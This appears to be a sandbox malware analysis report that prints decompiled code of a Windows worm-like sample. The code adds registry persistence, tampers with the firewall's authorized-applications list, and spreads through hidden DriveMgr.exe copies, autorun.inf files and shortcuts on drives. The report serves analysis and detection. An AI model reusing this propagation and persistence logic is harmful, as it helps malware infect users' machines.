						E008B27E0(_t619 - 0xf80);
						E008B27E0(_t619 - 0xf94);
						E008B27E0(_t619 - 0xa14);
						_t622 = _t622 + 0x1c;
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1038, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x770, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1020, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x49c, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf80, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf94, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xa14, 0, 4, _t619 - 0x20c, 4);
						RegCloseKey( *(_t619 - 0x75c));
					}
					Sleep(0x1f4);
					_t258 = E008B27E0(_t619 - 0x1008);
					_t623 = _t622 + 4;
					if(RegOpenKeyExA(0x80000002, _t258, 0, 0xf003f, _t619 - 0x75c) == 0) {
						E008B27E0(_t619 - 0x1038);
						E008B27E0(_t619 - 0x770);
						E008B27E0(_t619 - 0x1020);
						E008B27E0(_t619 - 0x49c);
						E008B27E0(_t619 - 0xf80);
						E008B27E0(_t619 - 0xf94);
						E008B27E0(_t619 - 0xa14);
						_t623 = _t623 + 0x1c;
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1038, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x770, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1020, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x49c, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf80, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf94, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xa14, 0, 4, _t619 - 0x20c, 4);
						RegCloseKey( *(_t619 - 0x75c));
					}
					Sleep(0x1f4);
					CreateThread(0, 0, E008B1660, 0, 0, 0);
					Sleep(0x1f4);
					CreateThread(0, 0, E008B2600, 0, 0, 0);
					Sleep(0x1f4);
					while(1) {
						Sleep(0x64);
						 *(_t619 - 0x1140) = 0;
						while( *(_t619 - 0x1140) < 8) {
							Sleep(0x64);
							 *(_t619 - 0x1144) = 0;
							while( *(_t619 - 0x1144) < 6) {
								Sleep(0x64);
								wsprintfA(_t619 - 0xd40, "%s%s",  *((intOrPtr*)(_t619 +  *(_t619 - 0x1140) * 4 - 0x7c0)),  *((intOrPtr*)(_t619 +  *(_t619 - 0x1144) * 4 - 0x9fc)));
								_t267 = E008B2A10(_t619 - 0xd40, _t619 +  *(_t619 - 0x1144) * 4 - 0x538);
								_t623 = _t623 + 0x18;
								if((_t267 & 0x000000ff) == 1) {
									E008B19F0(_t619 - 0xd40);
									_t623 = _t623 + 4;
								}
								 *(_t619 - 0x1144) =  *(_t619 - 0x1144) + 1;
							}
							 *(_t619 - 0x1140) =  *(_t619 - 0x1140) + 1;
						}
						_t262 = rand();
						asm("cdq");
						Sleep(0x2710 + _t262 % 0xea60 * 0x14);
					}
				}
				RegSetValueExA( *(_t619 - 0x75c), E008B27E0(_t619 - 0x54c), 0, 4, _t619 - 0x20c, 4);
				_t325 = E008B27E0(_t619 - 0xfe0);
				_t638 = _t621 + 8;
				if(RegOpenKeyExA(0x80000002, _t325, 0, 0xf003f, _t619 - 0x75c) != 0) {
					_t343 = E008B27E0(_t619 - 0xfe0);
					_t638 = _t638 + 4;
					RegCreateKeyExA(0x80000002, _t343, 0, 0, 0, 0x20006, 0, _t619 - 0x75c, 0);
				}
				_t328 = E008B27E0(_t619 - 0xfe0);
				_t621 = _t638 + 4;
				if(RegOpenKeyExA(0x80000002, _t328, 0, 0xf003f, _t619 - 0x75c) == 0) {
					E008B27E0(_t619 - 0x9e4);
					E008B27E0(_t619 - 0x4b8);
					E008B27E0(_t619 - 0xd5c);
					_t621 = _t621 + 0xc;
					RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x9e4, 0, 4, _t619 - 0x20c, 4);
					RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x4b8, 0, 4, _t619 - 0x20c, 4);
					RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xd5c, 0, 4, _t619 - 0x20c, 4);
					RegCloseKey( *(_t619 - 0x75c));
				}
				RegCloseKey( *(_t619 - 0x75c));
				goto L69;
			}

0x008b4437
0x008b4437
0x008b4437
0x008b4440
0x008b444d
0x00000000
0x00000000
0x008b4453
0x008b4458
0x008b445e
0x008b4468
0x00000000
0x008b4472
0x008b448b
0x008b4491
0x008b449e
0x008b4b6e
0x008b4b73
0x008b4b7b
0x008b4c9e
0x008b4ca7
0x00000000
0x008b4ca7
0x008b4b81
0x008b4b86
0x008b4b8c
0x00000000
0x008b4ba7
0x008b4bbd
0x008b4bc8
0x008b4ba1
0x008b4ba1
0x008b4bd5
0x008b4be8
0x008b4bf5
0x008b4bfc
0x008b4c09
0x008b4c16
0x008b4c21
0x008b4c31
0x008b4c3c
0x008b4c49
0x008b4c54
0x008b4c54
0x008b4c5a
0x00000000
0x008b4c75
0x008b4c86
0x008b4c96
0x008b4c6f
0x008b4c6f
0x00000000
0x008b4c75
0x008b44a4
0x008b44a9
0x008b44b4
0x008b44bf
0x008b44ca
0x008b44d5
0x008b44e5
0x008b44eb
0x00000000
0x008b4506
0x008b4517
0x008b4527
0x008b4537
0x008b4542
0x008b454d
0x008b4500
0x008b4500
0x008b455a
0x008b4565
0x008b4570
0x008b4580
0x008b458b
0x008b4596
0x008b45af
0x008b45ba
0x008b45c7
0x008b46ba
0x008b46bf
0x008b46ca
0x008b46d7
0x008b46e2
0x008b46ef
0x008b46fc
0x008b470c
0x008b4719
0x008b4729
0x008b472f
0x008b4739
0x008b474f
0x008b475f
0x008b476f
0x008b477a
0x008b478a
0x008b479d
0x008b47b6
0x008b47c3
0x008b47ce
0x008b47de
0x008b47fe
0x008b480b
0x008b4812
0x008b481d
0x008b482d
0x008b4838
0x008b4843
0x008b4843
0x008b4850
0x008b485b
0x008b485b
0x008b4868
0x008b4873
0x008b4880
0x008b4890
0x008b489f
0x008b48ac
0x008b48b7
0x008b48c2
0x008b48db
0x008b48e8
0x008b4908
0x008b4915
0x008b491c
0x008b492c
0x008b4937
0x008b4942
0x008b4942
0x008b494f
0x008b495a
0x008b4965
0x008b4970
0x008b4970
0x008b497d
0x008b497d
0x008b4880
0x008b4983
0x008b498d
0x00000000
0x008b4997
0x008b49b2
0x008b49bf
0x008b49c6
0x008b49d6
0x008b49e1
0x008b49ec
0x008b49f7
0x008b4a06
0x008b4a06
0x008b4a0c
0x008b4a1b
0x008b4a22
0x008b4a2d
0x008b4a38
0x008b4a43
0x008b4a53
0x008b4a53
0x008b4a66
0x008b4a73
0x008b4a7e
0x008b4a89
0x008b4a94
0x008b4aa1
0x008b4ab1
0x008b4ac0
0x008b4ad0
0x008b4ae0
0x008b4aeb
0x008b4af8
0x008b4b03
0x008b4b03
0x008b4b09
0x00000000
0x008b4b24
0x008b4b35
0x008b4b40
0x008b4b4b
0x008b4b5b
0x008b4b66
0x008b4b1e
0x008b4b1e
0x00000000
0x008b4b24
0x008b45cd
0x008b45d7
0x008b45e2
0x008b45ed
0x008b45f8
0x008b4603
0x008b4623
0x008b462e
0x008b463b
0x008b46a2
0x008b46a9
0x008b46b4
0x00000000
0x008b46b4
0x008b463d
0x008b463d
0x00000000
0x008b4658
0x008b4669
0x008b4674
0x008b4684
0x008b468f
0x008b469a
0x008b4652
0x008b4652
0x00000000
0x008b4658
0x008b4cb7
0x008b4ccb
0x008b4ced
0x008b4cf3
0x008b4cf8
0x008b4d07
0x008b4d0c
0x008b4d1b
0x008b4d20
0x008b4d42
0x008b4d65
0x008b4d6b
0x008b4d77
0x008b4d7f
0x008b4f3f
0x00000000
0x008b4f3f
0x008b4d85
0x008b4d8a
0x008b4da0
0x008b4da8
0x00000000
0x00000000
0x008b4dae
0x008b4db3
0x008b4dd3
0x008b4dd9
0x008b4de5
0x008b4df4
0x008b4e12
0x008b4e1a
0x008b4e23
0x008b4e28
0x008b4e2b
0x008b4e49
0x008b4e56
0x008b4e56
0x008b4e74
0x008b4e7c
0x008b4e85
0x008b4e8a
0x008b4eab
0x008b4eb8
0x008b4eb8
0x008b4ed6
0x008b4ede
0x008b4ee7
0x008b4eec
0x008b4eef
0x008b4f0d
0x008b4f1a
0x008b4f1a
0x008b4f27
0x008b4f2c
0x008b4f35
0x00000000
0x008b4f37
0x008b4f37
0x008b4f39
0x008b4f39
0x008b4f35
0x008b4f44
0x008b4f49
0x008b4f64
0x008b4f69
0x008b4f7a
0x008b50e3
0x008b50e8
0x008b5103
0x008b5108
0x008b5119
0x008b5126
0x008b5135
0x008b5144
0x008b5153
0x008b5162
0x008b5171
0x008b5180
0x008b5185
0x008b51a3
0x008b51c4
0x008b51e5
0x008b5206
0x008b5227
0x008b5248
0x008b5269
0x008b5276
0x008b5276
0x008b5281
0x008b529c
0x008b52a1
0x008b52b2
0x008b52bf
0x008b52ce
0x008b52dd
0x008b52ec
0x008b52fb
0x008b530a
0x008b5319
0x008b531e
0x008b533c
0x008b535d
0x008b537e
0x008b539f
0x008b53c0
0x008b53e1
0x008b5402
0x008b540f
0x008b540f
0x008b541a
0x008b542f
0x008b543a
0x008b544f
0x008b545a
0x008b5460
0x008b5462
0x008b5468
0x008b5483
0x008b5492
0x008b5498
0x008b54b3
0x008b54be
0x008b54ec
0x008b550a
0x008b550f
0x008b5518
0x008b5521
0x008b5526
0x008b5526
0x008b54ad
0x008b54ad
0x008b547d
0x008b547d
0x008b5533
0x008b5538
0x008b554a
0x008b554a
0x008b5460
0x008b4fa4
0x008b4fbf
0x008b4fc4
0x008b4fd5
0x008b4ff4
0x008b4ff9
0x008b5002
0x008b5002
0x008b501d
0x008b5022
0x008b5033
0x008b5040
0x008b504f
0x008b505e
0x008b5063
0x008b5081
0x008b50a2
0x008b50c3
0x008b50d0
0x008b50d0
0x008b50dd
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 008B4458
FindWindowA.USER32 ref: 008B448B
Sleep.KERNEL32(000007D0), ref: 008B44A9
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B44B4
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B44BF
Sleep.KERNEL32(000007D0), ref: 008B44CA
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B44D5
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B44E5
Sleep.KERNEL32(00000FA0), ref: 008B4517
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B4527
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B4537
Sleep.KERNEL32(00000FA0), ref: 008B4542
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B454D
Sleep.KERNEL32(000003E8), ref: 008B455A
PathFileExistsW.KERNELBASE(3r37grg73g7e37geg73g7eg73g7e), ref: 008B4B73
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B4B86
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B4BBD
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B4BC8
Sleep.KERNEL32(00001388), ref: 008B4BD5
FindWindowA.USER32 ref: 008B4BE2
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B4BFC
SetForegroundWindow.USER32(?), ref: 008B4C09
SetFocus.USER32(?), ref: 008B4C16
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B4C21
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B4C31
Sleep.KERNEL32(000000C8), ref: 008B4C3C
CloseWindow.USER32 ref: 008B4C49
Sleep.KERNEL32(00000FA0), ref: 008B4C54
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B4C86
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B4C96
Sleep.KERNELBASE(000001F4), ref: 008B4CB7
memset.MSVCRT ref: 008B4CCB
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,?,?,?,?,0000000A), ref: 008B4CED
rand.MSVCRT ref: 008B4CF3
rand.MSVCRT ref: 008B4D07
rand.MSVCRT ref: 008B4D1B
wsprintfW.USER32 ref: 008B4D42
wsprintfW.USER32 ref: 008B4D65
CreateDirectoryW.KERNELBASE(?,00000000), ref: 008B4D77
Sleep.KERNELBASE(000003E8), ref: 008B4D8A
CopyFileW.KERNELBASE(?,?,00000000), ref: 008B4DA0
Sleep.KERNELBASE(000003E8), ref: 008B4DB3
wsprintfW.USER32 ref: 008B4DD3
SetFileAttributesW.KERNELBASE(?,00000007), ref: 008B4DE5
SetFileAttributesW.KERNELBASE(?,00000007), ref: 008B4DF4
RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,000F003F,?), ref: 008B4E12
wcslen.MSVCRT ref: 008B4E23
Sleep.KERNEL32(000001F4,?,?,?,?,?,0000000A), ref: 008B4F49
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,?,?,?,?,0000000A), ref: 008B4F72
RegSetValueExA.ADVAPI32(?,00000000,?,00000004,?,?,?,?,?,0000000A), ref: 008B4FA4
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,?,?,?,?,?,0000000A), ref: 008B4FCD
RegCreateKeyExA.ADVAPI32(80000002,00000000,00020006,00000000,?,00000000,?,?,?,?,?,0000000A), ref: 008B5002
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,00000000,000F003F,?,?,?,?,?,?,0000000A), ref: 008B502B
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,?,00000000,000F003F,?), ref: 008B5081

Strings

3r37grg73g7e37geg73g7eg73g7e, xrefs: 008B4522
wgg4gwg4wgw4w4gw4gw4g4wghw4h, xrefs: 008B4486
w4rr4w4rw4rwr44rr4w4rr44r, xrefs: 008B44DB, 008B44E0, 008B452D
n#, xrefs: 008B4468
3r38r38r838r838r388r838r83, xrefs: 008B44AF, 008B44BA, 008B44D0, 008B4548
nw55n5nww5n5nww5nw5n5n5n5n, xrefs: 008B451D, 008B4532

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: File$Sleep$Delete$Move$OpenWindow$randwsprintf$AttributesCreateFindValue$CloseCopyDirectoryEnvironmentExistsExpandFocusForegroundPathStringsmemsetwcslen
String ID: 3r37grg73g7e37geg73g7eg73g7e$3r38r38r838r838r388r838r83$n#$nw55n5nww5n5nww5nw5n5n5n5n$w4rr4w4rw4rwr44rr4w4rr44r$wgg4gwg4wgw4w4gw4gw4g4wghw4h
API String ID: 3771346407-3591319307
Opcode ID: 8f1d1748c35f673e700e6631d31b9b5fabb0a4fad482be7cb38ecfe4b46fa26a
Instruction ID: 54b8889ad46c095d197706ad0446350563cb1d187bea764f7dc7a6f55ca36768
Opcode Fuzzy Hash: 8f1d1748c35f673e700e6631d31b9b5fabb0a4fad482be7cb38ecfe4b46fa26a
Instruction Fuzzy Hash: 3D213B35A40A69EBDB206B959C4EBD87770FB04706F004294F39AB1390E7BC1592CF12

Uniqueness

Uniqueness Score: -1.00%

Function 008B2730, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B2730(WCHAR* _a4) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v100;
				intOrPtr _v104;
				int _t18;

				memset( &_v100, 0, 0x44);
				memset( &_v24, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 5;
				_t18 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
				if(_t18 != 1) {
					_v8 = ShellExecuteW(0, L"open", _a4, 0, 0, 0);
					_v104 = _v8;
					if(_v104 <= 0x20) {
						return 0;
					}
					Sleep(0x3e8);
					return 1;
				}
				Sleep(0x3e8); // executed
				return 1;
			}

0x008b273e
0x008b274e
0x008b2756
0x008b275d
0x008b2769
0x008b2787
0x008b2790
0x008b27b8
0x008b27be
0x008b27c5
0x00000000
0x008b27d6
0x008b27cc
0x00000000
0x008b27d2
0x008b2797
0x00000000

APIs

memset.MSVCRT ref: 008B273E
memset.MSVCRT ref: 008B274E
CreateProcessW.KERNELBASE ref: 008B2787
Sleep.KERNELBASE(000003E8), ref: 008B2797
ShellExecuteW.SHELL32(00000000,open,008B1D08,00000000,00000000,00000000), ref: 008B27B2
Sleep.KERNEL32(000003E8), ref: 008B27CC

Strings

open, xrefs: 008B27AB
L!v, xrefs: 008B27B2
, xrefs: 008B27C1
D, xrefs: 008B2756

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open$L!v
API String ID: 3787208655-3862644752
Opcode ID: 958fd2085a042c81f173eca68dde621b8f08b5877cf06806f9bd26cc8272fd8d
Instruction ID: 62c94bf34262828a6eefcb94fd03c9120d0ab68734f8b28e9675039f2de4d7ee
Opcode Fuzzy Hash: 958fd2085a042c81f173eca68dde621b8f08b5877cf06806f9bd26cc8272fd8d
Instruction Fuzzy Hash: 93111F71A80308BBEB20DB94DD46FDE7778FB14B01F200254FB05BE2C1EAB5AA118759

Uniqueness

Uniqueness Score: -1.00%

Function 008B561A, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x8b75b0);
				_push(0x8b57a0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x8baac8 =  *0x8baac8 | 0xffffffff;
				 *0x8baacc =  *0x8baacc | 0xffffffff;
				_t23 = __p__fmode();
				_t45 =  *0x8baac4; // 0x0
				 *_t23 = _t45;
				_t24 = __p__commode();
				_t46 =  *0x8baac0; // 0x0
				 *_t24 = _t46;
				 *0x8baad0 = _adjust_fdiv;
				_t27 = E008B5799( *_adjust_fdiv);
				_t60 =  *0x8ba890; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E008B5796);
				}
				E008B5784(_t27);
				_push(0x8b900c);
				_push(0x8b9008);
				L008B577E();
				_t29 =  *0x8baabc; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x8baab8,  &_v112);
				_push(0x8b9004);
				_push(0x8b9000);
				L008B577E();
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t41 =  *_t54;
					} while (_t41 != 0 && _t41 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_t39 = GetModuleHandleA(0);
				_push(_t39); // executed
				E008B2AB0(); // executed
				_v108 = _t39;
				exit(_t39);
				_t40 = _v24;
				_t48 =  *((intOrPtr*)( *_t40));
				_v124 = _t48;
				_push(_t40);
				_push(_t48);
				L008B5778();
				return _t40;
			}

0x008b561d
0x008b561f
0x008b5624
0x008b562f
0x008b5630
0x008b563d
0x008b5642
0x008b5647
0x008b564e
0x008b5655
0x008b565c
0x008b5662
0x008b5668
0x008b566a
0x008b5670
0x008b5676
0x008b567f
0x008b5684
0x008b5689
0x008b568f
0x008b5696
0x008b569c
0x008b569d
0x008b56a2
0x008b56a7
0x008b56ac
0x008b56b1
0x008b56b6
0x008b56cf
0x008b56d5
0x008b56da
0x008b56df
0x008b56ec
0x008b56ee
0x008b56f4
0x008b5730
0x008b5735
0x008b5736
0x008b5736
0x008b56f6
0x008b56f6
0x008b56f6
0x008b56f7
0x008b56fa
0x008b56fc
0x008b5707
0x008b5709
0x008b5709
0x008b570a
0x008b570a
0x008b5707
0x008b570d
0x008b5711
0x00000000
0x00000000
0x008b5717
0x008b571e
0x008b5728
0x008b573d
0x008b572a
0x008b572a
0x008b572a
0x008b573e
0x008b573f
0x008b5740
0x008b5742
0x008b5748
0x008b5749
0x008b574e
0x008b5752
0x008b5758
0x008b575d
0x008b575f
0x008b5762
0x008b5763
0x008b5764
0x008b576b

APIs

__set_app_type.MSVCRT ref: 008B5647
__p__fmode.MSVCRT ref: 008B565C
__p__commode.MSVCRT ref: 008B566A
__setusermatherr.MSVCRT ref: 008B5696
_initterm.MSVCRT ref: 008B56AC
__getmainargs.MSVCRT ref: 008B56CF
_initterm.MSVCRT ref: 008B56DF
GetStartupInfoA.KERNEL32(?), ref: 008B571E
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 008B5742
exit.MSVCRT ref: 008B5752
_XcptFilter.MSVCRT ref: 008B5764

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 17351a3f19f02da180f82648d7894287adad2832449182334ce8205c59c90e6a
Instruction ID: 9c006eb1df83580c7d830cbe0e40ac45402e4c94821d98beed42f91c6dbab0c7
Opcode Fuzzy Hash: 17351a3f19f02da180f82648d7894287adad2832449182334ce8205c59c90e6a
Instruction Fuzzy Hash: C24191B1940B18EFDB249FA8DC85AE97BB8FB09710F24021AF591D73A1EB744841CF25

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008B20C0, Relevance: 108.8, APIs: 37, Strings: 25, Instructions: 324
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E008B20C0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a12, signed int _a16, signed char _a20) {
				short _v524;
				short _v1044;
				short _v1564;
				short _v2084;
				short _v2604;
				WCHAR* _v2608;
				short _v3132;
				short _v3652;
				char _v3653;
				struct _WIN32_FIND_DATAW _v4252;
				short _v4772;
				void* _v4776;
				short _v5300;
				intOrPtr _v5304;
				FILE* _v5308;
				WCHAR* _v5312;
				WCHAR* _v5316;
				intOrPtr _v5320;
				WCHAR* _v5324;
				WCHAR* _v5328;
				WCHAR* _v5332;
				WCHAR* _v5336;
				WCHAR* _v5340;
				WCHAR* _v5344;
				WCHAR* _v5348;
				WCHAR* _v5352;
				WCHAR* _v5356;
				WCHAR* _v5360;
				WCHAR* _v5364;
				WCHAR* _v5368;
				signed char _v5369;
				signed char _v5370;
				signed int _v5376;
				signed int _v5380;
				FILE* _t165;
				intOrPtr _t183;
				intOrPtr _t184;
				void* _t241;
				void* _t242;
				void* _t248;

				E008B55C0(0x1500, __ecx);
				if((_a16 & 0x00080000) != 0) {
					return 0;
				}
				_v2608 = L"__";
				_v3653 = 0;
				wsprintfW( &_v2084, L"%s.lnk", _a12);
				wsprintfW( &_v5300, L"%s\\%s\\DriveMgr.exe", _a4, _v2608);
				wsprintfW( &_v4772, L"%s\\%s", _a4, _v2608);
				wsprintfW( &_v3132, L"%s\\%s", _a4,  &_v2084);
				wsprintfW( &_v1564, L"%s\\*", _a4);
				wsprintfW( &_v524, L"%s\\autorun.inf", _a4);
				_t248 = _t242 + 0x54;
				if(PathFileExistsW( &_v5300) != 0) {
					_t183 = E008B2880( &_v5300);
					_t248 = _t248 + 4;
					_v5304 = _t183;
					_t184 =  *0x8ba8a8; // 0x0
					if(_t184 != _v5304) {
						SetFileAttributesW( &_v5300, 0x80);
						DeleteFileW( &_v5300);
					}
				}
				if(PathFileExistsW( &_v5300) == 0) {
					if(PathFileExistsW( &_v4772) == 0 && CreateDirectoryW( &_v4772, 0) != 0) {
						SetFileAttributesW( &_v4772, 7);
					}
					if(PathFileExistsW( &_v4772) != 0) {
						CopyFileW(0x8ba8b0,  &_v5300, 0);
						SetFileAttributesW( &_v3132, 1);
					}
				}
				if(PathFileExistsW( &_v3132) == 0) {
					if((_a20 & 0x000000ff) == 0) {
						E008B1EC0( &_v3132,  &_v5300, L"shell32.dll", 8);
						_t248 = _t248 + 0x10;
					} else {
						E008B1EC0( &_v3132,  &_v5300, L"shell32.dll", 9);
						_t248 = _t248 + 0x10;
					}
					SetFileAttributesW( &_v3132, 5);
				}
				if(PathFileExistsW( &_v524) == 0) {
					_push("w");
					_t165 =  &_v524;
					_push(_t165);
					L008B55B2();
					_t248 = _t248 + 8;
					_v5308 = _t165;
					if(_v5308 != 0) {
						fwprintf(_v5308, L"[AuToRuN]\nShEllExECutE=__\\DriveMgr.exe\nUsEAuToPLaY=1");
						fclose(_v5308);
						_t248 = _t248 + 0xc;
						SetFileAttributesW( &_v524, 7);
					}
				}
				_v4776 = FindFirstFileW( &_v1564,  &_v4252);
				if(_v4776 == 0xffffffff) {
					L47:
					return _v3653;
				} else {
					_v5368 = L"*.lnk";
					_v5364 = L"*.vbs";
					_v5360 = L"*.bat";
					_v5356 = L"*.js";
					_v5352 = L"*.scr";
					_v5348 = L"*.com";
					_v5344 = L"*.jse";
					_v5340 = L"*.cmd";
					_v5336 = L"*.pif";
					_v5332 = L"*.jar";
					_v5328 = L"*.dll";
					_v5324 = L"*.vbe";
					_v5320 = _v2608;
					_v5316 =  &_v2084;
					_v5312 = L"autorun.inf";
					do {
						if(lstrcmpW( &(_v4252.cFileName), ".") != 0 && lstrcmpW( &(_v4252.cFileName), L"..") != 0) {
							_v5370 = 0;
							_v5376 = 0;
							while(_v5376 < 3) {
								if(lstrcmpiW( &(_v4252.cFileName),  *(_t241 + _v5376 * 4 - 0x14c4)) == 0) {
									_v5370 = 1;
									break;
								}
								_v5376 = _v5376 + 1;
							}
							if((_v5370 & 0x000000ff) == 0) {
								_v5369 = 0;
								_v5380 = 0;
								while(_v5380 < 0xc) {
